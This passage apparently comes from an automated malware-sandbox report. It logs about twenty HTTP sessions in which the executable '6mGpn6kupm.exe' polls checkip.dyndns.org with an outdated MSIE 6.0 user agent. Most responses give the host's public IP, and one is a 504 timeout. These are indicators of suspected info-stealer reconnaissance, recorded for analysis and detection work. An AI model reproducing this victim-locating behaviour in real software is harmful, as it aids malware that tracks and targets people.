                                                                                                            Jan 10, 2025 21:49:44.642702103 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:49:44 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.1049979132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:49:45.772128105 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 21:49:46.463574886 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:49:46 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.1049981132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:49:47.514292002 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:49:48.209731102 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:49:48 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.1049983132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:49:49.188750982 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:49:49.880873919 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:49:49 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.1049985132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:49:51.027573109 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:49:51.715744019 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:49:51 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.1049987132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:49:52.733783007 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:49:53.412630081 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:49:53 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.1049989132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:49:54.412559986 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:49:55.110183954 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:49:55 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.1049991132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:49:56.035412073 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:49:56.707268000 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:49:56 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.1049993132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:49:57.603646994 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:49:58.279535055 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:49:58 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.1049995132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:49:59.174350023 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:49:59.859024048 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:49:59 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.1049997132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:50:00.784451962 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:50:12.329430103 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                                            Date: Fri, 10 Jan 2025 20:50:12 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 557
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.1049998132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:50:12.346396923 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:50:23.038342953 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:50:22 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.1050000132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:50:23.913609982 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:50:24.740422964 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:50:24 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.1050002132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:50:25.656995058 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:50:26.417074919 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:50:26 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.1050004132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:50:27.249675989 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:50:28.971643925 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:50:28 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.1050006132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:50:29.926539898 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:50:31.359970093 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:50:31 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.1050008132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:50:32.247325897 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:50:32.919162989 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:50:32 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.1050010132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:50:33.820760965 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:50:34.501948118 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:50:34 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.1050012132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:50:35.560878992 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:50:36.278785944 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:50:36 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.1050014132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:50:37.355726004 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:50:39.054969072 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:50:38 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
